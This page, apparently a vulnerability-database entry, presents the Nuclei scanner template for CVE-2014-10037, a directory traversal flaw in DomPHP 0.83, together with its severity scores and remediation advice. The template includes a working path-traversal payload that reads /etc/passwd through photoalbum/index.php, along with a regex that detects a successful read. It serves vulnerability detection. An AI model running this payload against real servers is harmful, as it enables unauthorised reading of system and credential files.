Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-10037
HistorySep 27, 2021 - 11:02 a.m.

DomPHP 0.83 - Directory Traversal

2021-09-2711:02:48
ProjectDiscovery
github.com
1

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.9 Medium

AI Score

Confidence

High

0.141 Low

EPSS

Percentile

95.7%

A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a … (dot dot) in the url parameter to photoalbum/index.php.

id: CVE-2014-10037

info:
  name: DomPHP 0.83 - Directory Traversal
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
  impact: |
    An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/30865
    - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
    - http://www.exploit-db.com/exploits/30865
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/90582
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2014-10037
    cwe-id: CWE-22
    epss-score: 0.14101
    epss-percentile: 0.95548
    cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: domphp
    product: domphp
  tags: cve2014,cve,lfi,edb,domphp

http:
  - method: GET
    path:
      - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a89179af6be12060f1fe5577e41d64f1b2826960d0485ad9e47556edc6ce21aa02205a19be61ffd6eb717e6ba7e0e9fe45d7292c97bf00654bebf6691684a9e5aef9:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.9 Medium

AI Score

Confidence

High

0.141 Low

EPSS

Percentile

95.7%

Related for NUCLEI:CVE-2014-10037